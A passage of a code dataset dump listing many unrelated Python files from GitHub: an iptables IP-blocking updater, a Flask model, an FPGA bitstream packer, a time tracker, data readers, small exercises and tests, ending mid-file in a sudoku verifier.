(enter within 30 seconds)\\033[0m\")\n #if sudo is not already cached\n if os.system(\"sudo -v\") != 0:\n # set a 30-second timeout to wait for user input\n def handler(signum, frame):\n raise Exception(\"30 seconds elapsed, password not entered\")\n signal.signal(signal.SIGALRM, handler)\n signal.alarm(30)\n try:\n # Ask for sudo password\n os.system(\"sudo -v\")\n # Reset the alarm\n signal.alarm(0)\n except Exception as e:\n print(str(e))\n return\n 
\n if os.system(\"sudo -v\") != 0:\n print(\"Run the script with sudo privileges\")\n exit()\n print(\"Deleting firewall rules of the previous Blocked_IPs...\")\n\n # Specify the folder to the CSV files containing the IPs to be unblocked\n csvs_folders = os.path.join(SOFTWARE_DIR, 'Blacklisted_IP')\n\n # The name of the firewall chain to add the rules to\n chain_name = CHAIN_NAME\n\n # check if the chain not already exists\n current_platform = platform.system()\n chain_name_present = False\n\n if current_platform == 'Linux':\n # Get all the chain names using the iptables command and regex\n command = \"sudo iptables -L -n\"\n output = subprocess.check_output(command, shell=True).decode('utf-8')\n chain_names = re.findall(r\"Chain\\s(\\w+)\", output)\n\n # Check if the chain already exists in the list of chain names\n if chain_name in chain_names:\n chain_name_present = True\n else:\n # If the chain name does not exist, create it\n command = f'sudo iptables -N {chain_name}'\n subprocess.call(command, shell=True)\n print(f\"Firewall RuleChain-, Chain '{chain_name}' created successfully.\")\n\n\n ########################[Windows and MacOS support is under development]################\n # Get the current platform\n current_platform = platform.system()\n # Delete all rules in the chain\n if current_platform == 'Linux':\n os.system(f'sudo iptables -F {chain_name}')\n os.system(f'sudo iptables -X {chain_name}')\n # elif current_platform == 'Darwin':\n # os.system(f'sudo pfctl -t {chain_name} -T flush')\n # elif current_platform == 'Windows':\n # os.system(f'powershell.exe Remove-NetFirewallRule -DisplayName \"Block all {chain_name}\"')\n else:\n print(f'Error: Platform \"{current_platform}\" not supported')\n print(f\"\\033[1mAll Firewall rules in {chain_name} chain deleted successfully\\033[0m\")\n\nif __name__=='__main__':\n if(len(sys.argv)>1):\n SOFTWARE_DIR=sys.argv[1]\n CONFIG = os.path.join(SOFTWARE_DIR,CONFIG)\n unblock_ip_firewall()\n block_ip_firewall()","repo_name":"prakharguptaujjain/IP_protect","sub_path":"utils/firewall_updater/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9133,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"70731169371","text":"from email.policy import default\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import nullslast\n\ndb = SQLAlchemy()\n\n\ndef connect_db(app):\n db.app = app\n db.init_app(app)\n app.app_context().push()\n\n# MODELS GO HERE\n\n\nclass Pet(db.Model):\n \"\"\"Department Model --> Each department has multiple employees\"\"\"\n\n __tablename__ = 'pets'\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n name = db.Column(db.Text, nullable=False)\n species = db.Column(db.Text, nullable=False)\n image_url = db.Column(db.Text)\n age = db.Column(db.Integer)\n notes = db.Column(db.Text)\n available = db.Column(db.Boolean, nullable=False, default=True)\n","repo_name":"johnathan-booy/Adopt","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14378892571","text":"import sys\nimport os\nimport re\n\nsys.path.append(os.path.join(os.path.join(sys.path[0], '..'), 'bitstream'))\nfrom chips import ChipWithID, ChipOrPackageNamed\nfrom utils import string_to_bits, bits_to_string\n\nif len(sys.argv) < 3:\n print(\"usage: %s [device_id]\" % sys.argv[0])\n sys.exit(-1)\n \n\n#\n# Create bits for the 
bitstream\n#\nif len(sys.argv) < 4:\n chip = ChipWithID(0x00120010)\nelse:\n chip = ChipOrPackageNamed(sys.argv[3])\n\nbits_by_tile = []\nfor col in range(0, chip.columns):\n col_bits = []\n for row in range(0, chip.rows):\n tile = chip.tile_at(col, row)\n if tile is None:\n col_bits.append([])\n else:\n col_bits.append(tile.empty_bits())\n bits_by_tile.append(col_bits)\n\nbits_by_config = []\nfor chain in chip.configChain:\n bits_by_config.append(chain.empty_bits())\n\n#\n# Read the fasm file\n#\nfilename = sys.argv[1]\nwith open(filename, \"r\") as file:\n lines = file.readlines()\n\nuseFormatters = True\nfor line in lines:\n line = line.strip()\n if len(line) == 0:\n continue\n if line[0] == \"#\":\n if line == \"#nofmt!\":\n useFormatters = False\n elif line == \"#fmt!\":\n useFormatters = True\n continue\n \n match = re.match(\"^([^_]*)_([XY]-?[0-9]*)([XY]-?[0-9]*).(.*)$\", line)\n assert match is not None\n \n comps = match.groups()\n assert len(comps) == 4\n \n row = None\n col = None\n for comp_index in range(1,3):\n coordinate = comps[comp_index]\n if coordinate[0] == 'X':\n col = int(coordinate[1:])\n elif coordinate[0] == 'Y':\n row = int(coordinate[1:])\n \n assert row is not None\n assert col is not None\n \n setting = comps[3].split(\"=\")\n if len(setting) == 1:\n setting.append(\"1\")\n \n key = setting[0].strip()\n if key[-1] == \"]\":\n openb = key.rfind(\"[\")\n key = key[0:openb]\n value = string_to_bits(setting[1].strip())\n \n if row < 0 and comps[0] == 'C':\n chain_idx = col\n success = chip.configChain[chain_idx].encode(chip, None, None, None, key, value, bits_by_config[chain_idx])\n assert success;\n continue;\n \n tile = chip.tile_at(col, row)\n assert tile is not None\n assert tile.type[0] == comps[0]\n \n bits = bits_by_tile[col][row]\n success = tile.encode(key, value, bits, useFormatters) \n if success:\n if useFormatters:\n if key.startswith(\"TileClkMUX\"):\n # In af bitstreams, used logic tiles get this key/value set..\n value = [0,0,0,1]\n tile.encode(\"TileAsyncMUX00\", value, bits)\n elif key.startswith(\"alta_slice\") and key.endswith(\"INIT[15:0]\"):\n key = key[:-11] + \"_CARRY_CRL\"\n tile.encode(key, [1], bits)\n else:\n chain_idx = 0\n for chain in chip.configChain:\n success = chain.encode(chip, tile.type, row, col, key, value, bits_by_config[chain_idx])\n if success:\n break\n chain_idx += 1\n \n if not success:\n print(\"Did not enocde key:%s line:%s\" % (key, line))\n \n # Hack to fix I/O\n if useFormatters and key.startswith(\"alta_rio\") and key.endswith(\"OUTPUT_USED\"):\n slice = int(key[8:10])\n if slice < 4:\n for x in range (1, 4):\n name = \"IOMUX%02i\" % (slice + (4 * x))\n bit_len = len(tile.values[name])\n tile.encode(name, [0] * bit_len, bits, False)\n\n\n#\n# Write the ASC file\n#\nasc = open(sys.argv[2], 'w')\nasc.write(\".device 0x%x\\n\\n\" % chip.device_id)\n\nchain_idx = 0\nfor chain in bits_by_config:\n asc.write(\".config_chain %i\\n\" % (chain_idx))\n asc.write(bits_to_string(bits_by_config[chain_idx]))\n asc.write(\"\\n\\n\")\n chain_idx += 1\n\nfor tile_col in range(0, chip.columns):\n for tile_row in range(0, chip.rows):\n tile = chip.tile_at(tile_col, tile_row)\n if tile is None:\n continue\n asc.write(\".%s %i %i\\n\" % (tile.type, tile_col, tile_row))\n bits = bits_by_tile[tile_col][tile_row]\n bit_idx = 0\n for bit_row in range(0, tile.bitstream_height):\n row_str = \"\"\n for bit_col in range(0, tile.bitstream_width):\n row_str += str(bits[bit_idx])\n bit_idx += 1\n asc.write(row_str)\n asc.write(\"\\n\")\n 
asc.write(\"\\n\")\nasc.close()","repo_name":"pablomarx/rodinia","sub_path":"nextpnr/fasm_pack.py","file_name":"fasm_pack.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"32"} +{"seq_id":"43053746499","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport json\nimport datetime\nfrom datetime import datetime as dt\nfrom collections import OrderedDict\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-f\", \"--file\",\n type = str,\n dest = \"path\",\n required = True,\n help = \"The path of the time-recorded file (*.json)\"\n )\n\n parser.add_argument(\n \"-d\", \"--day\",\n type = str,\n dest = \"day\",\n default =None,\n help = \"Select date to calculate\"\n )\n\n parser.add_argument(\n \"-p\", \"--plot\",\n type = bool,\n dest = \"plot\",\n default = False,\n const = True,\n nargs=\"?\",\n help = \"Display all data as a pie chart\"\n )\n\n parser.add_argument(\n \"-n\", \"--newplot\",\n type = bool,\n dest = \"new_plot\",\n default = False,\n const = True,\n nargs=\"?\",\n help = \"Display new format json file all data as a pie chart\"\n )\n\n return parser\n\n\ndef mk_dict(pairs):\n ret_dict = OrderedDict()\n for elem in pairs:\n ret_dict[elem[0]] = ret_dict[elem[0]] + \",\" + elem[1] if elem[0] in ret_dict else elem[1]\n return ret_dict\n\n\ndef read_json(path):\n fp = open(path, \"r\", encoding=\"utf-8\")\n json_dict = json.load(fp, object_pairs_hook=mk_dict)\n return json_dict\n\n\ndef calc_time(str_time):\n del_t = datetime.timedelta();\n str_time = str_time.split(\",\")\n for s_time in str_time:\n t_elem = s_time.split(\"-\")\n del_t += dt.strptime(t_elem[1], \"%H:%M\") - dt.strptime(t_elem[0], \"%H:%M\")\n return del_t\n\ndef new_format_calc_time(str_time):\n del_t = datetime.timedelta();\n for s_time in str_time:\n t_elem = s_time.split(\"-\")\n del_t += dt.strptime(t_elem[1], \"%H:%M\") - dt.strptime(t_elem[0], \"%H:%M\")\n return del_t\n\ndef summarize(use_data):\n data = OrderedDict()\n for key in use_data:\n t_del = calc_time(use_data[key])\n minute = t_del.seconds//(60)\n t = datetime.time(hour=minute//60, minute=minute%(60))\n work_name = key.split(\"/\", 1)\n if work_name[0] in data:\n data[work_name[0]].append([work_name[1], t])\n else:\n if len(work_name) == 1:\n data[work_name[0]] = t\n else:\n data[work_name[0]] = [[work_name[1], t]]\n return data\n\ndef output(data):\n for key in data:\n if type(data[key]) == list:\n print(\"* {0}\".format(key))\n for elem in data[key]:\n msg = \" ** {0}: {1}h{2}m\"\n if elem[1].hour == 0:\n msg = \" ** {0}: {2}m\"\n elif elem[1].minute == 0:\n msg = \" ** {0}: {1}h\"\n print(msg.format(elem[0], elem[1].hour, elem[1].minute))\n else:\n msg = \"* {0}: {1}h{2}m\"\n if data[key].hour == 0:\n msg = \"* {0}: {2}m\"\n elif data[key].minute == 0:\n msg = \"* {0}: {1}h\"\n print(msg.format(key, data[key].hour, data[key].minute))\n\ndef aggregate(all_data):\n ret_data = {}\n for day in all_data:\n data_elem = all_data[day]\n for subj_key in data_elem:\n subj = subj_key.split(\"/\")[0]\n t = calc_time(data_elem[subj_key])\n ret_data[subj] = ret_data[subj] + t if subj in ret_data else t\n return ret_data\n\n\ndef hex2color(hex_c):\n return [int(hex_c[1:3],16)/256.0,int(hex_c[3:5],16)/256.0,int(hex_c[5:7],16)/256.0,1]\n\n\ndef plot(all_data):\n import numpy as np\n import matplotlib.pyplot as plt\n import matplotlib.cm as cm\n\n my_color = read_json(\"./color_config.json\")\n\n label = []\n data = []\n col = 
[None for i in range(len(all_data))]\n\n for i, elem in enumerate(sorted(all_data.items(), key=lambda x: -x[1])):\n key = elem[0]\n val = elem[1]\n h = int(all_data[key].total_seconds()//(60*60))\n m = int(all_data[key].total_seconds()/60 - h*60)\n str_t = \"{0}h{1}m\".format(h, m)\n label.append(\"{0} [{1}]\".format(key, str_t))\n data.append(val.total_seconds()/60)\n if key in my_color:\n col[i] = hex2color(my_color[key])\n\n no_color_lange = col.count(None)\n cmap = cm.gist_rainbow(np.arange(no_color_lange)/float(no_color_lange))\n\n cnt = 0\n for i, elem in enumerate(col):\n if elem is None:\n col[i] = cmap[cnt]\n cnt += 1\n\n plt.rcParams['font.family'] = 'Yu Mincho'\n # plt.rcParams['font.family'] = 'Hiragino Maru Gothic Pro'\n plt.figure(figsize=(18, 10))\n plt.pie(data,counterclock=False,startangle=90,autopct=lambda p:'{:.1f}%'.format(p), colors=col)\n plt.subplots_adjust(left=0,right=0.7)\n plt.legend(label, fancybox=True, loc='upper left', bbox_to_anchor=(0.83, 1))\n plt.axis('equal')\n plt.show()\n\ndef new_format_aggregate(all_data):\n ret_data = {}\n for day in all_data:\n data_elem = all_data[day]\n for subj in data_elem:\n for subj_key in data_elem[subj]:\n t = new_format_calc_time(data_elem[subj][subj_key])\n ret_data[subj] = ret_data[subj] + t if subj in ret_data else t\n return ret_data\n\ndef main():\n parser = parse_arguments()\n args = parser.parse_args()\n data = read_json(args.path)\n\n if args.plot:\n data = aggregate(data)\n plot(data)\n\n elif args.new_plot:\n data = new_format_aggregate(data)\n plot(data)\n\n elif args.day is not None:\n use_data = data[args.day]\n data = summarize(use_data)\n output(data)\n\n else:\n parser.print_help()\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"R-Imai/dailyProgress-calculation","sub_path":"calc_timer.py","file_name":"calc_timer.py","file_ext":"py","file_size_in_byte":5772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11340690895","text":"# -*- coding: utf-8 -*-\n\n#------------------------------------------------------------------------------------------------------------------------------\n# SYS.ARGV[0] -> eventsReader.py\n# SYS.ARGV[1] -> pasta raiz do teste\n\n# A pasta raiz do teste deve conter as pastas LOG, JSON e CSV, e dentro de JSON deve haver dois arquivos, frames.json e events.json\n\n# EXEMPLO: dimi@dimi-lss01:~$ python3 eventsReader.py ../../Aquisicoes/Pycom/Teste1\n#------------------------------------------------------------------------------------------------------------------------------\n\nimport json\nimport sys\nimport os\nfrom datetime import datetime\nimport base64\n\nif len(sys.argv) != 2:\n\tprint(\"Erro na entrada de parâmetros. 1 -> caminho para a pasta raiz da aquisicao. \")\nelse:\n\t# LENDO OS PARÂMETROS\n\tarquivoJSON = sys.argv[1] + \"/JSON/events.json\"\n\n\t# VERIFICANDO SE O ARQUIVO JSON EXISTE MESMO\n\tarquivoExiste = os.path.isfile(arquivoJSON)\n\t\n\tif arquivoExiste == False or arquivoExiste == 0:\n\t\tprint(\"O arquivo JSON que você está tentando abrir não existe. 
Verifique o nome e o caminho.\")\n\telse:\n\t\t# ABRINDO O ARQUIVO JSON E LENDO\n\t\twith open(arquivoJSON, 'r') as jsonFile:\n\t\t\tdata = json.load(jsonFile)\n\n\t\t# CRIANDO UM ARQUIVO CSV PRA GRAVAR AS INFORMAÇÕES NELE TB\n\t\tnomeCSV = sys.argv[1] + \"/CSV/ENDNODE_\" + datetime.now().strftime('%Y%m%d%H%M%S') + \".csv\"\n\t\tcsvFile = open(nomeCSV, \"a+\")\n\n\t\tcsvFile.write(\"fCnt,\")\n\t\tcsvFile.write(\"data,\")\n\t\tcsvFile.write(\"adr,\")\n\t\tcsvFile.write(\"dr,\")\n\t\tcsvFile.write(\"frequency\\n\")\n\t\t\n\t\t# VOU PASSAR POR CADA ELEMENTO DO LORA E SALVAR APENAS O QUE EU QUERO\n\t\tfor x in data:\n\t\t\ttry:\n\t\t\t\t# IGNORANDO OS ACKS\n\t\t\t\tif x[\"result\"][\"type\"] == \"uplink\":\n\t\t\t\t\t# TODAS AS INFORMAÇÕES QUE EU QUERO ESTÃO DENTRO DE UMA STRING QUE É UM JSON\n\t\t\t\t\tstringPayLoad = str(x[\"result\"][\"payloadJSON\"])\n\t\t\t\t\tjsonPayLoad = json.loads(stringPayLoad)\n\n\t\t\t\t\t# PEGANDO AS INFORMAÇÕES\n\t\t\t\t\tfCnt = str(jsonPayLoad[\"fCnt\"])\n\t\t\t\t\tadr = str(jsonPayLoad[\"adr\"])\t\t\t\t\t\n\t\t\t\t\tdr = str(jsonPayLoad[\"txInfo\"][\"dr\"])\n\t\t\t\t\tfrequency = str(jsonPayLoad[\"txInfo\"][\"frequency\"])\t\t\t\t\t\n\n\t\t\t\t\t# PEGANDO A MENSAGEM QUE ESTA EM BASE64\n\t\t\t\t\tdataBase64 = str(jsonPayLoad[\"data\"])\n\t\t\t\t\tdata = str(base64.b64decode(dataBase64))\n\n\t\t\t\t\t# REMOVENDO AQUELE b'' DA MENSAGEM\n\t\t\t\t\tdata = data[2:-1]\n\n\t\t\t\t\t# PRINTANDO NO TERMINAL E ESCREVENDO NO CSV\t\t\t\t\t\t\n\t\t\t\t\tstringFinal = fCnt + \",\"\n\t\t\t\t\tstringFinal = stringFinal + data + \",\"\n\t\t\t\t\tstringFinal = stringFinal + adr + \",\"\t\t\t\t\n\t\t\t\t\tstringFinal = stringFinal + dr + \",\"\n\t\t\t\t\tstringFinal = stringFinal + frequency + \"\\n\"\n\n\t\t\t\t\t# ESCREVENDO NO CSV\n\t\t\t\t\tcsvFile.write(stringFinal)\n\t\t\texcept:\n\t\t\t\tprint(\"eventsReader.py -> Algum dado não pôde ser lido.\")\n\n\t\tcsvFile.close()","repo_name":"DimitriLeandro/SBrT2019","sub_path":"Scripts/Python/eventsReader.py","file_name":"eventsReader.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"12791937920","text":"import math\n\nn=[]\n\nm=int(input(\"Število elementov: \"))\n\nfor i in range(0,m):\n ele=(int(input(\"Število: \")))\n\n n.append(ele)\n\n\ndef vrni(list):\n\n avg = sum(list)/len(list)\n \n najblizja = 0\n for i in list:\n razlika = abs(avg-i)\n if razlika < abs(avg-najblizja):\n najblizja = i\n \n\n\n print(max(list), min(list), avg, najblizja)\n\n\n\nvrni(n)","repo_name":"matevzkalcic/TP","sub_path":"DN4/naloga2.py","file_name":"naloga2.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40413398607","text":"\"\"\" This script converts effective pom.xml to dependency report in JSON format \"\"\"\nimport argparse\nimport os\nimport sys\n\nfrom mt.ef import create_dependency_report_json, EXIT_CODE_ERROR\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Create dependency report from effective pom.xml')\n parser.add_argument('--effective_pom_file', help='Path to effective pom.xml', required=True)\n parser.add_argument('--report_file', help='Path to target dependency report', required=True)\n\n args = parser.parse_args()\n\n if not os.path.exists(args.effective_pom_file):\n print(f\"{args.effective_pom_file} not found\")\n sys.exit(EXIT_CODE_ERROR)\n\n with open(args.report_file, \"w\") as 
report_file:\n report_file.write(create_dependency_report_json(args.effective_pom_file))\n","repo_name":"afrunt/maven-toys","sub_path":"effective_pom_to_dependency_report.py","file_name":"effective_pom_to_dependency_report.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74895887450","text":"class Solution:\n def isValidSerialization(self, preorder: str) -> bool:\n def hasSingleHash(stack):\n return len(stack) == 1 and stack[0] == \"#\"\n\n if preorder == \"#\":\n return True\n preorderStack = preorder.split(',')\n stack = []\n\n for v in preorderStack:\n if hasSingleHash(stack):\n return False\n stack.append(v)\n\n while len(stack) >= 2 and stack[-1] == \"#\" and stack[-2] == \"#\":\n if len(stack) == 2:\n return False\n stack = stack[:-3]\n stack.append(\"#\")\n return hasSingleHash(stack)\n","repo_name":"debbs061/algorithm","sub_path":"src/331-verify-preorder-serialization-of-a-binary-tree.py","file_name":"331-verify-preorder-serialization-of-a-binary-tree.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41304358799","text":"import torch\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom secondmodel import PosePredictionTransformer\nfrom secondpreprocessing import KinectDataset\n\n# Function to make predictions with the model\ndef make_predictions(model, dataloader, device):\n predictions = []\n model.eval() # Set the model to evaluation mode\n with torch.no_grad():\n for i, (input_seq, _) in enumerate(dataloader):\n input_seq = input_seq.to(device)\n output = model(input_seq) # Get model predictions\n predictions.append(output.cpu().numpy()) # Store predictions\n return predictions\n\n# Combine predictions with overlapping averaging\ndef average_overlapping_predictions(predictions, overlap_size):\n averaged_predictions = []\n for i in range(len(predictions)):\n for j in range(5): # Assuming each prediction has 5 frames\n if i == 0 and j < overlap_size:\n # Initialize the first set of predictions\n averaged_predictions.append(predictions[i][j])\n elif j < overlap_size:\n # Average the overlapping predictions\n index = i + j\n averaged_predictions[index] = (averaged_predictions[index] + predictions[i][j]) / 2\n else:\n # Add the non-overlapping predictions\n averaged_predictions.append(predictions[i][j])\n for i in range(len(averaged_predictions)):\n #multiply each element by 1000 just to make it easier to see on OpenGL\n averaged_predictions[i] = averaged_predictions[i] * 1000\n return averaged_predictions\n\n# Placeholder paths\nmodel_path = 'lowest_avg.pth'\ndata_path = '../data/midterm-processed/curve-right_processed.txt'\noutput_path = '../../../visualization/joint_visualizations/right-predict.txt'\n\n# Model parameters (adjust as necessary)\nnum_layers = 3\nd_model = 32\nnum_heads = 8\n\n# Load the trained model\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nmodel = PosePredictionTransformer(num_layers, d_model, num_heads)\nmodel.load_state_dict(torch.load(model_path, map_location=device))\nmodel.to(device)\n\n# Load the data using KinectDataset\ndataset = KinectDataset(data_path)\ndataloader = DataLoader(dataset, batch_size=1, shuffle=False)\n\n# Make predictions\npredictions = make_predictions(model, dataloader, device)\npredictions = np.array(predictions)\npredictions = predictions.reshape(predictions.shape[0], 5, 3)\n\n# 
Average the overlapping predictions\noverlap_size = 4 # Number of frames that overlap between predictions\naveraged_predictions = average_overlapping_predictions(predictions, overlap_size)\n\n# Save predictions to file\nwith open(output_path, 'w') as f:\n for pred in averaged_predictions:\n f.write(\"[\")\n # Assuming each prediction is a numpy array with a shape of (num_features,)\n pred_string = ','.join(map(str, pred))\n f.write(pred_string + ']' + '\\n')\nprint(f\"Predictions saved to {output_path}\")\n","repo_name":"Navya025/pose_prediction_hallway_passing","sub_path":"transformer/custom/hip_only/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35572800186","text":"\nfrom django.urls import path\n\nfrom shop.views import index, search, create_announce, edit_announcement, announce_details, delete_announce\n\nurlpatterns = [\n path('', index, name='index page'),\n path('results/', search, name='result page'),\n path('create_announce/', create_announce, name='create announcement'),\n path('edit_announce/', edit_announcement, name='edit announce'),\n path('details_announce/', announce_details, name='details announce'),\n path('delete_announce/', delete_announce, name='delete announce'),\n ]\n","repo_name":"StoyanDimStoyanov/django_exam","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1081803105","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def leafSimilar(self, root1: Optional[TreeNode], root2: Optional[TreeNode]) -> bool:\n\n if self.leaves(root1)==self.leaves(root2):\n return True\n return False\n \n def leaves(self,root):\n res=[]\n def helper(root):\n if not root:\n return \n if not root.left and not root.right:\n res.append(root.val)\n helper(root.left)\n helper(root.right)\n \n helper(root)\n return res\n \n ","repo_name":"pratham76/Leetcode","sub_path":"0904-leaf-similar-trees/0904-leaf-similar-trees.py","file_name":"0904-leaf-similar-trees.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70325746971","text":"import mraa as m\nimport unittest as u\n\nfrom i2c_checks_shared import *\n\nclass I2cChecksWriteWordData(u.TestCase):\n def setUp(self):\n self.i2c = m.I2c(MRAA_I2C_BUS_NUM)\n\n def tearDown(self):\n del self.i2c\n\n def test_i2c_write_word_data(self):\n self.i2c.address(MRAA_MOCK_I2C_ADDR)\n high_byte = 0xAA\n low_byte = 0xBB\n test_word = (high_byte << 8) + low_byte\n reg = MRAA_MOCK_I2C_DATA_LEN - 2\n self.assertEqual(self.i2c.writeWordReg(reg, test_word),\n m.SUCCESS,\n \"I2C writeWordReg() did not return success\")\n self.assertEqual(self.i2c.readReg(reg),\n high_byte,\n \"I2C readReg() of higher byte after writeWordReg() returned unexpected data\")\n self.assertEqual(self.i2c.readReg(reg + 1),\n low_byte,\n \"I2C readReg() of lower byte after writeWordReg() returned unexpected data\")\n\n def test_i2c_write_word_data_invalid_addr(self):\n self.i2c.address(MRAA_MOCK_I2C_ADDR - 1)\n test_word = 0xAABB\n reg = MRAA_MOCK_I2C_DATA_LEN - 2\n self.assertEqual(self.i2c.writeWordReg(reg, test_word),\n m.ERROR_UNSPECIFIED,\n \"I2C 
writeWordReg() to invalid address did not return error\")\n\n def test_i2c_write_word_data_invalid_reg(self):\n self.i2c.address(MRAA_MOCK_I2C_ADDR)\n test_word = 0xAABB\n reg = MRAA_MOCK_I2C_DATA_LEN\n self.assertEqual(self.i2c.writeWordReg(reg, test_word),\n m.ERROR_UNSPECIFIED,\n \"I2C writeWordReg() with invalid register did not return error\")\n\nif __name__ == \"__main__\":\n u.main()\n","repo_name":"eclipse/mraa","sub_path":"tests/mock/i2c_checks_write_word_data.py","file_name":"i2c_checks_write_word_data.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":1333,"dataset":"github-code","pt":"32"} +{"seq_id":"72078300251","text":"\"\"\"\n Program to increment the numeric value in a string and return the processed string\n\n Input: st = 'xrt123ish-9tq'\n Output: 'xrt124ish-8tq'\n\"\"\"\n\nimport sys\n\n\ndef increment_integer_in_string(st):\n tmp, res = [], []\n for k, i in enumerate(st):\n if i == '-' and st[k+1].isdigit() or i.isdigit():\n tmp.append(i)\n else:\n if tmp:\n tmp = \"\".join(tmp)\n res.append(str(int(tmp)+1))\n res.append(i)\n tmp = []\n return \"\".join(res)\n\n\nif __name__ == \"__main__\":\n if sys.version_info.major == 2 and sys.version_info.minor < 8:\n input = raw_input\n else:\n input = input\n st = input(\"Enter the string: \")\n print(increment_integer_in_string(st))","repo_name":"harishtm/learningpython","sub_path":"coding_programs/increment_integer_in_string.py","file_name":"increment_integer_in_string.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4663360566","text":"from path import Path\nfrom io_utils.preprocess import SIMPLE_FILTERS, preprocess_review\nimport cPickle as pkl\n\nimport platform\nif platform.system() == 'Windows':\n cr_pickle = Path('C:/Users/Song/Course/571/project/pickled_data/cr.pkl')\n pos = Path('D:/data/nlpdata/cr/custrev.pos')\n neg = Path('D:/data/nlpdata/cr/custrev.neg')\nelse:\n cr_pickle = Path('/home/scz8928999/data/pickled/cr.pkl')\n pos = Path('/home/scz8928999/data/cr/custrev.pos')\n neg = Path('/home/scz8928999/data/cr/custrev.neg')\n\n\ndef read_data(p):\n label = 1 if p[-3:] == 'pos' else 0\n f = open(p)\n x = []\n for line in f:\n line = unicode(line, errors='ignore')\n x.append(preprocess_review(line, filters=SIMPLE_FILTERS))\n y = [label] * len(x)\n return x, y\n\n\ndef save_cr_pickle():\n pos_x, pos_y = read_data(pos)\n neg_x, neg_y = read_data(neg)\n x = pos_x + neg_x\n y = pos_y + neg_y\n f = open('cr.pkl', 'wb')\n pkl.dump((x, y), f, -1)\n f.close()\n\n\ndef read_cr_pickle():\n f = open(cr_pickle, 'rb')\n x, y = pkl.load(f)\n return x, y","repo_name":"csong27/NgramNeuralNetworks","sub_path":"io_utils/load_data/load_cr.py","file_name":"load_cr.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25673035204","text":"#!/usr/bin/python3\n\"\"\"\nCalculate island perimeter\n\"\"\"\n\ndef island_perimeter(grid):\n perimeter = 0\n for r in range(len(grid)):\n for c in range(len(grid[r])):\n if grid[r][c] == 1:\n sur = get_surround(r, c, grid)\n perimeter += sum([1 for w in sur if w == 0])\n return perimeter\n\n\ndef get_surround(i, j, grid):\n return (grid[i][j + 1], grid[j][j - 1], grid[i - 1][j], grid[i + 
1][j])\n","repo_name":"anasyaser/alx-low_level_programming","sub_path":"0x1C-makefiles/5-island_perimeter.py","file_name":"5-island_perimeter.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3474983128","text":"'''\nVerify an 2D numpy array that fulfill the conditions for SUDOKU\n'''\n\nimport numpy as np\nimport logging\n\npath = r'C:\\Users\\Horace.000\\eclipse-workspace\\Python_Project_6_Online_Courses\\00_ALL\\numpy\\Apps\\verify_sudoku.log'\n\nlogging.basicConfig(format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.DEBUG,\n filename=path, \n filemode='w')\n\nlogger = logging.getLogger('main')\n\n\ndef split_the_grid_in_small_squares(grid_arr):\n '''\n Split the grid in small squares and make a list with them\n '''\n ss_list = list()\n \n #ss0 = grid_arr[0:3, 0:3]\n #logging.debug(f'\\n{ss0}')\n #ss1 = grid_arr[0:3, 3:6]\n #logging.debug(f'\\n{ss1}')\n #ss2 = grid_arr[0:3, 6:9]\n #logging.debug(f'\\n{ss2}')\n #ss3 = grid_arr[3:6, 0:3]\n #logging.debug(f'\\n{ss3}')\n \n for m in range(0,9,3):\n for n in range(0,9,3):\n ss = grid_arr[m:m+3, n:n+3]\n print(ss)\n #logging.debug(f'\\n{ss}')\n ss_list.append(ss)\n \n return ss_list\n\n\ndef verify_solution(grid_arr):\n \n NINE = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9])\n \n logging.info(f'The grid for verification is: \\n{grid_arr}')\n \n # verify the rows\n for r in range(9):\n logging.info(f'Verifying row nr. {r}: {grid_arr[r, :]}')\n if (np.sort(grid_arr[r, :]) == 